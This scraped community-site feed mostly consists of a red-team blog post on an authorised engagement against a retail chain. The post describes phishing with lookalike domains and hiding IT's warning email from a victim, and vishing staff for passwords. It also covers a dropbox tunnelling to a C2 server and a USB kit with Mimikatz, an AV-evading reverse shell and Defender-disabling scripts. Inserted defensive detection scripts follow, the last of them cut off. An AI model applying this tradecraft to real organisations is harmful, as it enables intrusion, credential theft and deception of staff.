<p><a href="https://github.com/east-african-techguy">Javan</a> holds a Masters degree from Rhodes University and has five years of experience in penetration testing, with a strong interest in cloud security. In his spare time, he enjoys going to the gym and making music.</p>
<h2 id="securing-a-cloud-native-open-source-microservice-based-core-banking-system---ntando-mngomezulu">Securing a cloud native open source microservice based core banking system - Ntando Mngomezulu</h2>
<p>Open Source in information systems is a fundamental driving force of collaboration, transparency, and accountability. Open-Source software also creates a conduit for rapidly prototyping ideas and deploying them to test their efficacy and evaluating their business case. In the FinTech sector, which is characterized by high paced innovation and stringent demands on privacy and confidentiality, these attributes are highly desirable as a mechanism to improve security of systems as a collaborative effort between security professionals to deliver exactly the type of software which we should strive to take to our markets.</p>
<p>In this talk, we will explore an example of collaboration on open-source software in order to deploy and test a FinTech system, namely FineractCN and its deployment on AWS in conjunction with Keycloak to effectively improve upon the security of a system which is built for the cloud native future we are moving into.</p>
<p><em>About Ntando</em></p>
<p><a href="https://www.linkedin.com/in/ntandomng">Ntando</a> is a Senior Security Analyst at Synthesis Software Technologies responsible for the establishment and continuous maintenance and testing of client organizations’ infrastructure, network, and web security. Ntando has over 10 years of IT experience within a variety of sectors such as health, broadcasting, streaming, and Fintech.</p>
<h2 id="dafuq---the-security-outlook-for-2023---charl-van-der-walt">Dafuq - The Security Outlook for 2023 - Charl van der Walt</h2>
<p>A look at what to expect for 2023.</p>
<p><em>About Charl</em></p>
<p><a href="https://twitter.com/charlvdwalt">Charl</a> is the Head of Security Research at Orange Cyber Defense.</p>
<h3 id="conclusion">Conclusion</h3>
<p>We look forward to seeing everyone at our event!</p>
0xcon
About Charl Charl is the Head of Security Research at Orange Cyber Defense Conclusion We look forward to seeing everyone at our event!PIFv22022-07-10T00:00:00+00:002022-07-10T00:00:00+00:00https://hacksouth.africa/community/PIF-v2<p><img src="/assets/images/payitforward/pif.gif" alt="Pay it forward" class="align-center" /></p>
<h1 id="as-many-people-in-the-infosec-community-are-aware---getting-your-oscp-is-something-life-changing--worldwide-there-are-a-vast-number-of-individuals-who-understand-what-a-golden-opportunity-it-is-to-complete-the-pwk-course-even-more-so-when-its-free">As many people in the InfoSec community are aware - getting your OSCP is something life-changing. <br /> Worldwide, there are a vast number of individuals who understand what a golden opportunity it is to complete the PWK course, even more so when it’s free.</h1>
<p style="text-align: center;"><strong><span style="background-color: white; color: black;padding: 2px; display: inline-block">Yes, FREE! <br /> No strings attached. <br /> We just want our community to succeed. </span></strong>
</p>
<h2 id="how-it-started">HOW IT STARTED:</h2>
<p>Following the death of George Floyd, <a href="https://www.offensive-security.com">Offensive Security</a> created their Social Responsibility Program. One of the goals of this program was to provide sets of <a href="https://www.offensive-security.com/pwk-oscp/">PEN200 / Penetration Testing with Kali Linux</a> vouchers to various community organisations around the world, who would be able to pass the voucher onto underrepresented individuals in the industry, or those who were trying to get into the industry.</p>
<h2 id="how-we-did-it">HOW WE DID IT:</h2>
<p>Initially the applicants were restricted to South Africans only, but due to a surprising and disappointingly poor response from local candidates, submissions were opened up to applicants from Africa. This was done in an effort to keep the initiative as <strong>local</strong> as possible, and not to lose our momentum.</p>
<h3 id="the-application-process-comprised-of-roughly-three-steps">The application process comprised roughly three steps:</h3>
<ol>
<li>An application email, where the applicant needed to meet the criteria outlined <a href="https://hacksouth.africa/community/Pay-It-Forward">here</a>.</li>
<li>If an applicant was considered suitable, their submission was followed up with a video meeting (aka, “the interview”). This was primarily to get to know the candidate better, as well as determine if they would be a good fit.</li>
<li>Applicants were then asked to complete (aka ‘root’) three machines and submit a report.</li>
</ol>
<p>This ensured that (other than requiring access to a computer and/or data) the process was entirely free, <strong>and</strong> that candidates were at an adequate technical competency to:</p>
<ol>
<li>Manage and benefit from the content in the PWK course and,</li>
<li>Have a high likelihood of passing the exam after completing the course - as our intentions have always been to set our candidates up for success.</li>
</ol>
<h2 id="in-a-nutshell">IN A NUTSHELL:</h2>
<p>The campaign was aptly launched on Youth Day, 16 June 2021, and the final voucher was awarded on 25 May 2022. Below are some high-level stats from the last year:</p>
<ul>
<li>34 individuals applied to Pay It Forward</li>
<li>33 were male</li>
<li>1 applicant was female</li>
<li>12 were from South Africa</li>
<li>13 were from other African countries</li>
<li>9 were from countries outside of Africa</li>
<li>19 candidates were interviewed, 11 submitted reports and 10 vouchers were awarded.</li>
</ul>
<h2 id="our-pif-ers">OUR PIF-ERS:</h2>
<p>Congratulations to our ten awardees, in chronological order:</p>
<ol>
<li>1warrenshoko - South Africa</li>
<li>Hustlebunny - South Africa</li>
<li>Anonymous - Nigeria</li>
<li>Anonymous - Madagascar</li>
<li>Sp3ctrlM0nki3 - South Africa</li>
<li>SonOfABot - Nigeria</li>
<li>Anonymous - Madagascar</li>
<li>Anonymous - Nigeria</li>
<li>Anonymous - DRC</li>
<li>Gari - Rwanda</li>
</ol>
<h2 id="big-thanks">BIG THANKS:</h2>
<p>I’d like to thank AngusRed for his help during the first 6 months and TOKO for the second half of this year-long process. I couldn’t have done this without you two and I’m beyond grateful for your contribution to this initiative.</p>
<p>I’d also like to thank those who agreed to be mentors. Spymky recently ran a Buffer Overflow workshop for candidates. Classes like this allow questions to be asked in real time, candidates benefit enormously from sessions like these, and we (as a collective) will continue to contribute to their ongoing success.</p>
<h2 id="but-wait-theres-more">BUT WAIT, THERE’S MORE:</h2>
<p>Initiatives like this rely on the generosity of those who see the value in them. On that note, I’m delighted to announce that I was able to secure <strong>another 10 PWK vouchers</strong> from Offensive Security, which means <strong>PIFv2</strong> will be starting up soon!</p>
<p><img src="/assets/images/payitforward/41DA3E0C-2AD1-4194-ADE1-3512AF29BFCF.PNG" alt="Pay it forward!" class="align-center" /></p>
<p>Candidates who have already applied will be prioritised, as well as South African candidates - but if you think you meet the criteria and would like to apply, please follow the instructions <a href="https://hacksouth.africa/community/Pay-It-Forward/">here</a>.</p>
<p style="text-align: center;"><strong><span style="background-color: white; color: black;padding: 2px; display: inline-block">I cannot wait to see what the next chapter of the Pay It Forward initiative will bring, and how many lives HackSouth is going to be able to change. </span></strong>
</p>
MunX
Red Teaming - My first physical assessment
2022-02-15T00:00:00+00:00
https://hacksouth.africa/careers/red-teaming-my-first-physical-assessment
<p><img src="/assets/images/redteamingfirst/red-team-500px.jpg" alt="Preview" class="align-center" /></p>
<p><strong>Red Teaming - My first physical assessment</strong><br />
By <strong>chrismeistre</strong></p>
<p>I’ve recently been given the opportunity to perform my first physical assessment during a black box engagement for a client.</p>
<p>In short, the black box permitted us to try anything to gain access to their infrastructure, and assess their IT security awareness and defenses.</p>
<p>I was excited about this, and when the time finally came, I wasn’t left wanting.</p>
<p>If you’re reading this as an aspiring hacker, or just someone interested in cyber security or the infosec community, you’ve probably heard at least one story of a red teamer performing a physical assessment. I have listened to many interviews and read stories, so I thought I knew what to expect.</p>
<p>The TL;DR is that it’s definitely not as hard as I imagined it would be.</p>
<p>What I’d like to discuss in this article are the technical (a few) and social engineering (a lot) aspects of this engagement.</p>
<h3 id="our-goal">Our goal</h3>
<p>We decided that our goal for this engagement would be to fully compromise their internal network, and take over the domain controller. There was a feeling in the team that if we could just gain access into the internal network, the escalation to taking over the domain controller should not be too hard.</p>
<h4 id="a-side-note">A side note</h4>
<p>It is normally the case that once we get onto the internal network, we’re able to escalate to domain administrator with relative ease, especially at companies that haven’t gone through an internal vulnerability assessment or penetration test. A lot of companies spend all their time and money on securing their external-facing infrastructure, which is definitely a good thing. They do, however, forget that their internal network could be riddled with opportunities for an attacker.</p>
<h3 id="the-start-of-the-engagement">The start of the engagement</h3>
<p>Whenever we start with an engagement, we go through a checklist of things to do.</p>
<p>Amongst other things, it involves:</p>
<ol>
<li>Obtain information (through OSINT) about the company and their employees</li>
<li>Compile a list of externally accessible devices (domains and IPs)</li>
<li>Enumerate the devices to determine what services are accessible to us</li>
<li>Look for low-hanging fruit and/or weaknesses to exploit from the comfort of our offices</li>
</ol>
<p>During this black box, we spent a good number of days with the first phase. Although we found a number of critical vulnerabilities, it was not anything that would gain us access into the internal network.</p>
<h3 id="phishing">Phishing</h3>
<p>The second phase involved performing a phishing attack on the company.</p>
<p>The goal of phishing during a black box engagement is different to just performing a phishing attack assessment. For a black box, we are not testing to see how many clicks there are, or how many credentials are captured. We want to obtain valid credentials, and at the same time go undetected.</p>
<p>We were able to obtain a small number of valid emails addresses through OSINT.</p>
<p>I’m still working on my own methodology for phishing attacks, but here are a few things I do, which have proved quite successful so far:</p>
<ol>
<li>Register a domain that is very similar to the company’s domain. An example would be if you’re going to attack google.com, perhaps something like googlesupport.com is a good idea. We have also registered a number of domain names that are generic. I alternate between using a very targeted domain and generic ones, depending on who the target is.</li>
<li>Use web portals that you find during the first phase (enumerating) of the engagement, and set up a login page that looks similar. A lot of our clients are using security and spam solutions for email, so it’s been getting a lot more difficult to create email content and fake pages based on ones that already exist. This is where my experience as a web application developer comes in, as I’m able to create pages pretty much from scratch, to still look the same, but be totally different. I also have a very generic login page that I use, where I just swop out the client’s logo each time.</li>
<li>Craft the emails that will go out to seem urgent enough that if they don’t respond soon, they might end up in trouble. This is also where a lot of time is spent, compiling and sending off emails to see if they trigger any junk, spam or malicious filters.</li>
<li>Once the credentials are submitted on the page, redirect them to a page or a document that appears legitimate. It’s good if you can find a page that is hosted on their own website. If nothing happens when they submit their credentials on the form, they might contact the IT department to determine if something is the matter.</li>
</ol>
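<p>From the defender’s side, the first item in that list (a lookalike domain) is the one that can be caught earliest, because registrations and TLS certificates show up in public feeds before any email is sent. The Python below is an added example, not code from the original post: it scores candidate domains from a newly-registered-domain or certificate-transparency feed against a protected brand domain and labels the common lookalike patterns (same label under another suffix, homoglyph substitution, brand plus a keyword such as “support”, and plain typosquats by edit similarity). The brand domain, the keyword list and the candidate feed are constructed placeholders, and the label extraction assumes a single registrable label before the suffix; a real pipeline would use the public suffix list.</p>

```python
"""Score candidate domains against a protected brand domain to catch lookalikes.

Added example (not from the original post). BRAND_DOMAIN, KEYWORDS and
SAMPLE_FEED are constructed placeholders.
"""
import difflib

BRAND_DOMAIN = "example-retail.co.za"   # constructed stand-in for the client's real domain

# Words commonly appended to a brand to build a plausible-looking lookalike.
KEYWORDS = ("support", "login", "secure", "portal", "help", "mail", "vpn", "account")

# Visually similar substitutions, applied to BOTH sides before comparing so
# that "examp1e" and "example" normalise to the same string.
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"),
              ("3", "e"), ("5", "s"), ("7", "t"))

TYPO_THRESHOLD = 0.8  # SequenceMatcher ratio at or above which a label counts as a typosquat

# Constructed feed of "newly seen" domains, as a CT log or NRD feed might deliver them.
SAMPLE_FEED = [
    "example-retail.co.za",        # our own domain: must not be flagged
    "example-retail.com",          # same label, different suffix
    "examp1e-retail.co.za",        # digit 1 for letter l
    "example-retailsupport.com",   # brand + "support"
    "myexample-retail.co.za",      # brand embedded, no keyword
    "exmaple-retail.co.za",        # transposed letters
    "totally-unrelated.com",       # noise
]


def registrable_label(domain: str) -> str:
    """Lower-cased first DNS label (assumption: one label before the suffix)."""
    return domain.lower().strip(".").split(".")[0]


def normalise(label: str) -> str:
    """Drop hyphens and fold look-alike characters so cosmetic tricks collapse."""
    label = label.replace("-", "")
    for src, dst in HOMOGLYPHS:
        label = label.replace(src, dst)
    return label


def classify(candidate: str, brand: str = BRAND_DOMAIN):
    """Return (verdict, similarity) for a lookalike, or None for an unrelated domain."""
    if candidate.lower().strip(".") == brand.lower():
        return None                                   # the brand's own domain
    cand, base = registrable_label(candidate), registrable_label(brand)
    if cand == base:
        return ("tld-swap", 1.0)                      # identical label under another suffix
    ncand, nbase = normalise(cand), normalise(base)
    if ncand == nbase:
        return ("homoglyph", 1.0)                     # differs only by look-alike characters
    if nbase in ncand:
        remainder = ncand.replace(nbase, "", 1)
        if any(word in remainder for word in KEYWORDS):
            return ("brand-plus-keyword", 1.0)        # e.g. brandsupport, brand-login
        return ("brand-embedded", 1.0)
    ratio = difflib.SequenceMatcher(None, ncand, nbase).ratio()
    if ratio >= TYPO_THRESHOLD:
        return ("typosquat", round(ratio, 3))         # close edit similarity: typos, transpositions
    return None


def scan(domains, brand: str = BRAND_DOMAIN):
    """Run classify() over a feed and return (domain, verdict, similarity) for each hit."""
    hits = []
    for domain in domains:
        result = classify(domain, brand)
        if result is not None:
            hits.append((domain, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for domain, verdict, score in scan(SAMPLE_FEED):
        print(f"{domain:30} {verdict:20} {score}")
```

<p>Each verdict maps to a different response: a tld-swap or homoglyph of your own label is worth a registrar takedown request, while a brand-plus-keyword hit is the pattern to feed into the mail gateway’s blocklist and the SOC’s watchlist before the campaign starts.</p>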
<p>The first attempt at the phishing attack was not successful. We did not even get one click, which was very surprising to me, because this specific combination of email and landing page has always been successfully used.</p>
<p>I let it be for a few days, and then started delving into why it could possibly not have worked. It turned out that due to an error on our server, at the exact time we started the phishing campaign, none of the emails even reached the targets.</p>
<p>With this information at hand, we launched another attack. This time there was nothing for about 30 minutes, which is also odd, so I thought we had another issue. My frustration subsided as soon as the notification came in that we had a data submission. This meant a target had clicked on the link in the email, gone to our fake site and filled in their username and password.</p>
<p>We used this information to access this person’s emails. Looking for keywords in their emails, we learned the following:</p>
<ol>
<li>The VPN software they are using has 2FA enabled. This meant that if we wanted to gain access through their VPN, we would have to gain access to this person’s cellphone or do a vhishing attack to obtain the auth token needed to complete the 2FA request while connecting to the VPN.</li>
<li>We found a number of usernames and passwords used to access external services.</li>
<li>We observed that the IT department had noticed our phishing attacks, and had warned the users that if they had clicked on the link in the email, they should immediately contact the IT support team to change their passwords. To make sure our compromised user did not see that email, we deleted it from their inbox.</li>
<li>A complete contact list was available in the directory functionality of the webmail software, which gave us a list of many more targets for a phishing attack. We could also set it up so that the emails were sent directly from this person’s email address by making use of the webmail functionality.</li>
</ol>
<p>Based on the information we found about the steps taken when the phishing attack was noticed, we proceeded with a third attack.</p>
<p>We chose a smaller set of email addresses from users that appeared to be in less technical positions. The thinking is that users like these would be less likely to detect that the email they are receiving is not legitimate. We were again able to get at least one submission of valid credentials before the IT department detected the attack and proceeded to act against it. The password was changed the day after our attack.</p>
<p>Obtaining a valid set of credentials ended up being very important to us, even though we couldn’t use it to gain access to the internal network from the external devices.</p>
<p>This phase turned out to be a lot more difficult than usual, because the IT department was quite good at detecting it. That’s not something I’ve come across often while performing phishing.</p>
<h3 id="vhishing">Vhishing</h3>
<p>Our next phase would include vhishing attacks. This is where we engage with a target over the phone, in order to get them to provide us with sensitive information, or get them to perform actions on their computers for us.</p>
<p>This company had a lot of stores all over the country, so there were a lot of opportunities for vhishing. We gained a list of these stores and their contact details through OSINT.</p>
<p>It took me a few days to actually get onto the first attack. This would be the first time that I officially did this during an engagement, and I was trying to wrap my head around what the end goal was going to be. Was I going to get them to install something like AnyDesk on their PC that allowed me remote access, was I going to get them to open an email I’d send them containing something like a reverse shell, was I going to just get their passwords, or what was I supposed to do?</p>
<p>I eventually decided I was just going to wing it. The rough plan was:</p>
<ol>
<li>Phone them up</li>
<li>Introduce myself as John from head office IT</li>
<li>Ask to speak to someone sitting in front of the computer who could assist me in troubleshooting an issue</li>
<li>See what happens and go from there</li>
</ol>
<p>It took about 8 tries before one of the stores actually picked up the phone. I introduced myself, and it happened that the person I was speaking to was actually sitting in front of the computer. I explained that we could see there was an issue with her antivirus, and we needed to resolve it before something infected the computer and destroyed the data.</p>
<p>This person was more than willing to assist. I said I just needed to know which username and password was being used on that computer, to make sure we were going to be working on the right computer. Without hesitation, they provided their username and password. I took a chance and asked if they perhaps knew the password for the server too, but unfortunately they did not know that.</p>
<p>I proceeded to get them to open their web browser and see if they could go to a website. Unfortunately it appeared they were behind a proxy. I then had them open a command shell to run a ping against an external website, but there didn’t seem to be any access to the Internet from the workstation. As they were seeing an error on the screen, I took the opportunity to explain to them that it appeared we were not going to be able to fix the problem remotely, so we would have to send an IT person out to the store. This would set us up to do a physical penetration test at this store.</p>
<p>Before ending the call, I also asked for the manager’s name, surname and cellphone number, which I was given.</p>
<p>I proceeded to phone a number of stores with a similar script, obtaining information at each store. I was surprised that with just a bit of friendliness, you can solicit information from people without it triggering any suspicion.</p>
<h4 id="a-side-note-1">A side note</h4>
<p>During one conversation, I was informed of an actual IT problem that they were experiencing. I assured her that someone would be sent to look into this issue, setting myself up for a store visit if needed. I still feel bad that I never got to that store and I hope that eventually someone did sort out her problem.</p>
<h3 id="moving-onto-the-physical-assessment">Moving onto the physical assessment</h3>
<p>With the vhishing phase done, and having set ourselves up with a reason to access the stores and the IT infrastructure there, we proceeded to the next phase: the physical assessment.</p>
<h3 id="the-recon">The Recon</h3>
<p>I had a number of stores that were relatively close to me, so I decided to do some recon on them first, before deciding which will be the target or targets.</p>
<p>One good thing about the Covid pandemic, is that we are all forced to wear masks. That makes it easier to hide. The timing was also good, because I hadn’t cut my hair in a while.</p>
<p>My plan was to try and do the following at each store:</p>
<ol>
<li>Establish what type of security is implemented. This would include determining where security guards are placed, how they interact with clients, how busy the shop is, what type of access control there is for high-value areas, how accessible these high-value areas are and how much movement there is in those areas.</li>
<li>Check if there are any network connections that aren’t being used in the store somewhere. If these are available, it might be possible to put a dropbox in without anyone noticing.</li>
<li>Determine if there are any other opportunities for an attack.</li>
<li>Do a quick Wifi scan using my phone to see what access points are available.</li>
</ol>
<p>With the first store, I just went in with an open mind. And based on my plan, here is what I found:</p>
<ol>
<li>There is one security guard at the entrance, who seems very interested in making sure everyone has sanitised their hands. I observed him while making my way through the rest of the store; he appeared to be searching people’s bags as they exited the store.</li>
<li>There are CCTV cameras all over.</li>
<li>The store is quite busy, with a lot of movement inside.</li>
<li>Casually browsing around, I found a vacant network connection that also had a power plug right next to it. The way it was placed provided a perfect opportunity to place a dropbox without it being noticed. The only problem was that it was in view of the security guard, but after considering a few options around that area, I was confident I had a way to place the dropbox without drawing attention to myself.</li>
<li>I found that accessing the offices where the computers and most likely the server are stored would be easy. There was no access control, with doors open. Glancing down the passage as I walked past, I saw what looked like a server cabinet.</li>
<li>I found a number of Wifi access points active in the store, and took note of the security protocol each used.</li>
</ol>
<p>This store had ample opportunity to be a target, so I decided to head back to the office to set up and come back to see what we can achieve.</p>
<h3 id="building-the-dropbox-and-other-equipment">Building the dropbox and other equipment</h3>
<p>I’ll try and go into a little bit of detail here, but my plan is to write this up in a separate article. It was my first time setting up a dropbox, so there was quite a bit of experimenting and testing that went into this. Luckily there have been plenty of red teamers before my time, and they write about it all over the Internet.</p>
<h4 id="raspberry-pi-zero-w">Raspberry Pi Zero W</h4>
<p>This was the only device available to me while I waited for the other one to be delivered. I added an Ethernet and Battery HAT, because the device only has a built-in Wifi connection. The battery was to keep it running in case of a power failure, or someone unplugging the device.</p>
<p>I installed Kali on there, because then I would automatically have all my favourite tools as well.</p>
<p>I set it up to act as a wireless access point (hostapd), so that I could connect to it using my phone or laptop in case I needed to do any manual setup once I was in the store.</p>
<p>For persistence and connecting to our C2 server, I used an automated script (using autossh) to create a reverse SSH connection. I also set it up as a VPN (OpenVPN) client, to connect to our server automatically.</p>
<p>Not having a 3D printer, or being able to order cases for the Pi, I had to get creative with the box I was going to use. I put on some stickers and a warning label, which would hopefully look like it fit wherever I would leave it. Everything was ready to connect to a power source and to the network connection.</p>
<p>I tested it extensively in the office, making sure that once I had a reverse SSH connection, I can access the network, perform scans and run utilities.</p>
<p>Being a developer I love automating things, so to have this dropbox fire up the first time, connect to everything it was supposed to and give me access was such an awesome moment for me.</p>
<p>The Pi doesn’t have a lot of memory, so I knew I wouldn’t be able to run memory-intensive scans like Nessus. I figured that if I could just get a port scan of the network, I could pivot (proxychains) into the network and use further utilities from my own attack box.</p>
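<p>Everything the dropbox does to phone home leaves traces a store network already records: it takes a DHCP lease with a MAC the asset inventory has never seen, and autossh retries its reverse SSH session on a fixed schedule through the egress firewall. The Python below is an added example, not code from the original post or the tooling it describes: it parses a DHCP lease table and firewall egress log, flags leases whose MAC is not in the inventory (with an extra note when the OUI belongs to a Raspberry Pi), and reports outbound SSH or OpenVPN sessions from hosts that are not allowed to open them, counting repeats so a reconnect loop stands out. The lease and log line formats, the inventory, the egress allowlist and the OUI list are all constructed assumptions; swap in your own sources and refresh the OUIs from the IEEE registry.</p>

```python
"""Spot a dropbox on a branch network from two data sources defenders already have:
the DHCP lease table and the egress firewall log.

Added example (not from the original post). The lease and log formats, the asset
inventory, the egress allowlist and the OUI list are constructed assumptions.
"""
from collections import Counter

# Constructed asset inventory: MAC -> hostname for every device the store should have.
KNOWN_DEVICES = {
    "00:11:22:aa:bb:01": "POS-01",
    "00:11:22:aa:bb:02": "POS-02",
    "00:11:22:aa:bb:10": "STORE-SRV",
}

# OUI prefixes registered to Raspberry Pi (assumed list for illustration; refresh
# it from the IEEE OUI registry rather than trusting these three values).
PI_OUIS = ("b8:27:eb", "dc:a6:32", "e4:5f:01")

# Only the store server is expected to open SSH or OpenVPN sessions out of the store (assumption).
EGRESS_ALLOWED = {"10.20.5.10"}
TUNNEL_PORTS = {22: "ssh", 1194: "openvpn"}

# Constructed dnsmasq-style lease lines: <expiry> <mac> <ip> <hostname> <client-id>
DHCP_LEASES = """\
1700000000 00:11:22:aa:bb:01 10.20.5.11 POS-01 *
1700000000 00:11:22:aa:bb:02 10.20.5.12 POS-02 *
1700000000 00:11:22:aa:bb:10 10.20.5.10 STORE-SRV *
1700000100 b8:27:eb:3c:9d:41 10.20.5.77 kali *
"""

# Constructed egress log lines: <timestamp> <src> <dst> <dst_port> <proto> <action>
FIREWALL_LOG = """\
2022-02-15T09:01:02 10.20.5.10 203.0.113.5 443 tcp ALLOW
2022-02-15T09:01:05 10.20.5.77 198.51.100.9 22 tcp ALLOW
2022-02-15T09:01:35 10.20.5.77 198.51.100.9 22 tcp ALLOW
2022-02-15T09:02:05 10.20.5.77 198.51.100.9 22 tcp ALLOW
2022-02-15T09:02:06 10.20.5.77 198.51.100.9 1194 udp ALLOW
2022-02-15T09:03:00 10.20.5.11 203.0.113.5 443 tcp ALLOW
2022-02-15T09:03:10 10.20.5.10 198.51.100.20 22 tcp ALLOW
"""


def parse_leases(text: str) -> dict:
    """Map each leased IP to (mac, hostname)."""
    leases = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or line.startswith("#"):
            continue
        _expiry, mac, ip, hostname = parts[:4]
        leases[ip] = (mac.lower(), hostname)
    return leases


def find_rogue_devices(leases: dict, inventory: dict = KNOWN_DEVICES) -> list:
    """Devices holding a lease that the asset inventory does not know about."""
    findings = []
    for ip, (mac, hostname) in leases.items():
        reasons = []
        if mac not in inventory:
            reasons.append("MAC not in asset inventory")
        if mac.startswith(PI_OUIS):
            reasons.append("Raspberry Pi OUI")
        if reasons:
            findings.append({"ip": ip, "mac": mac, "hostname": hostname, "reasons": reasons})
    return findings


def find_tunnel_egress(log_text: str, leases: dict, allowed: set = EGRESS_ALLOWED) -> list:
    """Outbound SSH/OpenVPN from hosts not on the allowlist; repeats hint at an autossh loop."""
    counts = Counter()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        _ts, src, dst, port, _proto, action = parts[:6]
        port = int(port)
        if action != "ALLOW" or port not in TUNNEL_PORTS or src in allowed:
            continue
        counts[(src, dst, port)] += 1
    findings = []
    for (src, dst, port), n in sorted(counts.items()):
        mac, hostname = leases.get(src, ("unknown", "unknown"))
        findings.append({"src": src, "mac": mac, "hostname": hostname, "dst": dst,
                         "service": TUNNEL_PORTS[port], "count": n})
    return findings


if __name__ == "__main__":
    leases = parse_leases(DHCP_LEASES)
    for finding in find_rogue_devices(leases):
        print("ROGUE DEVICE", finding)
    for finding in find_tunnel_egress(FIREWALL_LOG, leases):
        print("TUNNEL EGRESS", finding)
```

<p>On the constructed data the unknown Pi at 10.20.5.77 is reported twice: once for its lease and once for three SSH attempts plus an OpenVPN connection to the same external address in under two minutes. Joining the two views on the source IP is what turns “new device” and “odd egress” into one incident, and 802.1X or sticky-MAC port security on the store switch is the control that stops the device getting a lease in the first place.</p>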
<h4 id="usb-drive">USB Drive</h4>
<p>Having a rough idea of what I’m going to face when I get access to the computers, I decided to also just prepare some utilities to use on the computers.</p>
<ul>
<li>Mimikatz (dump passwords and hashes in case I could log in as Administrator somewhere)</li>
<li>Custom built persistent reverse shell (I spent a few hours on building a reverse shell that would execute while evading antivirus and Microsoft Defender)</li>
<li>PowerView.ps1 (script to enumerate the domain)</li>
<li>plink (setup a reverse SSH on the workstations or servers)</li>
<li>Copy and paste scripts that I could use to create exclusion lists on Defender or disable it completely</li>
</ul>
<h5 id="a-side-note-2">A side note</h5>
<p>I added Mimikatz and PowerView into a password protected zip file. The last thing I wanted was to plug in the device, have the antivirus automatically scan the USB drive and then delete my utilities.</p>
<h4 id="other-equipment">Other equipment</h4>
<ul>
<li>Screwdriver (in case I needed to open the case)</li>
<li>Extra Ethernet cable, connection extender and connection splitter (in case I needed to hook into another connection that is already being used)</li>
<li>2-prong plug</li>
<li>USB charging cable</li>
<li>Laptop with Kali installed, and setup to automatically connect to the Pi via Wifi</li>
<li>Live Kali installation on a bootable USB</li>
<li>Company ID badge</li>
</ul>
<h3 id="going-to-the-shop">Going to the shop</h3>
<p>I decided to go to the store at a time I thought it would be even busier. By this time I had my hair cut, not really because of the engagement, but just coincidence.</p>
<p>By the time I stopped at the store and got out of the car, I was relatively at ease. It was as I was approaching the door that a stream of thoughts entered my head about what could go wrong.</p>
<h4 id="a-side-note-3">A side note</h4>
<p>It’s at this point it’s worth noting that we had full permission to do what I was about to do. There is normally a letter that we get, that we can carry with us. It’s called a “get out of jail free” card. You normally pull this out if anyone that catch on to what you are doing, and want to phone the police on you. The letter contains details about why you are at the store and who they can contact at their own head offices to validate the story. For anyone attempting this, I would recommend that you always keep that letter on you.</p>
<p>As I passed through the door, my mind was completely focused, and I walked straight to the security guard. I introduced myself, explained to him that I was there to provide IT support, and asked if he would be so kind as to direct me to where the offices were. It helped that I was able to provide him a name as well of the person I’m supposed to meet. The friendly guard happily showed me which direction to go. I could probably have just walked past him to the offices, but in my mind it was important to set up this contact with him. Now he is familiar with me, he knows why I am there, and probably won’t even look at me twice when he sees me again.</p>
<p>I walked to the offices, and had another brainwave. I got out my phone, and pretended that I was speaking to someone as I walked into the passageway that branched off to the offices. Making sure I could be heard by anyone in earshot, I pretended that I was telling the IT department that I just arrived and I will give them a “sitrep” as soon as I know what is going on. This worked out perfectly, because someone actually heard me and came out of their office before I even “hung up”. They looked at me, and asked if I’m from the IT department. I confirmed that I was, and gave them the name of the person (manager name that I obtained through the vhishing) I needed to make contact with. This happened to be the same person standing in front of me.</p>
<p>With that first point of contact out of the way, and having gone smoothly, I now had access to the office, and the computers it contained.</p>
<h4 id="successes">Successes</h4>
<ul>
<li>I had full access to the server cabinet, and in fact I could close the door behind me in the server room and carry on uninterrupted.</li>
<li>All workstations were logged in as local administrator users.</li>
<li>The server was logged in as Administrator.</li>
<li>The dropbox worked and I could access it via Wifi.</li>
<li>As I had access to the server cabinet, I didn’t need to hide the dropbox, I just plugged it directly into the network switch.</li>
<li>Disabling the antivirus or creating exception rules didn’t require passwords.</li>
<li>Workstations were all logged into various sensitive applications.</li>
</ul>
<h4 id="little-hurdles">Little hurdles</h4>
<ul>
<li>There was no DHCP on the network, so through a bit of trial and error I found an IP address I could use.</li>
</ul>
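<p>A defender’s counterpart to this hurdle, added here as an example and not code from the original post: with no DHCP on the store segment, a device on a hand-picked static address never shows up in lease logs, so the check below compares an <code>ip neigh</code>-style ARP table export against a small asset inventory and flags any host that is not in it, noting known Raspberry Pi OUIs. The inventory, the MAC addresses and the table snapshot are all constructed.</p>

```python
"""Rogue-host check for a flat store LAN that has no DHCP server.

Added example, not part of the original post. Assumptions: a host on the
segment (or the switch) can export its neighbour table in the form that
`ip neigh` prints on Linux, and the store keeps an inventory of the MAC
addresses that are supposed to be there. All sample data is constructed.
"""
import re
from dataclasses import dataclass

# Constructed inventory: MAC -> asset name. These are placeholders.
KNOWN_ASSETS = {
    "00:11:22:aa:bb:01": "store-server",
    "00:11:22:aa:bb:02": "pos-workstation-1",
    "00:11:22:aa:bb:03": "pos-workstation-2",
    "00:11:22:aa:bb:04": "label-printer",
}

# OUI prefixes (first three octets) registered to the Raspberry Pi
# Foundation / Raspberry Pi Trading. An unknown host with one of these
# prefixes on a point-of-sale switch deserves a physical look.
SUSPICIOUS_OUIS = {
    "b8:27:eb": "Raspberry Pi",
    "dc:a6:32": "Raspberry Pi",
}

# Matches lines such as:
#   192.168.10.5 dev eth0 lladdr 00:11:22:aa:bb:01 REACHABLE
# Entries without a link-layer address (FAILED / INCOMPLETE) do not match
# and are skipped, since nothing answered ARP for that IP.
NEIGH_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>[0-9a-fA-F:]{17})\s+(?P<state>\S+)$"
)

# Constructed snapshot of the neighbour table on the store segment.
SAMPLE_NEIGH = """\
192.168.10.5 dev eth0 lladdr 00:11:22:aa:bb:01 REACHABLE
192.168.10.21 dev eth0 lladdr 00:11:22:aa:bb:02 STALE
192.168.10.22 dev eth0 lladdr 00:11:22:aa:bb:03 REACHABLE
192.168.10.30 dev eth0 lladdr 00:11:22:aa:bb:04 DELAY
192.168.10.77 dev eth0 lladdr b8:27:eb:12:34:56 REACHABLE
192.168.10.78 dev eth0 FAILED
"""


@dataclass
class Finding:
    ip: str
    mac: str
    state: str
    reason: str


def parse_neigh(text):
    """Return (ip, mac, state) for every resolved neighbour-table entry."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            entries.append((m["ip"], m["mac"].lower(), m["state"]))
    return entries


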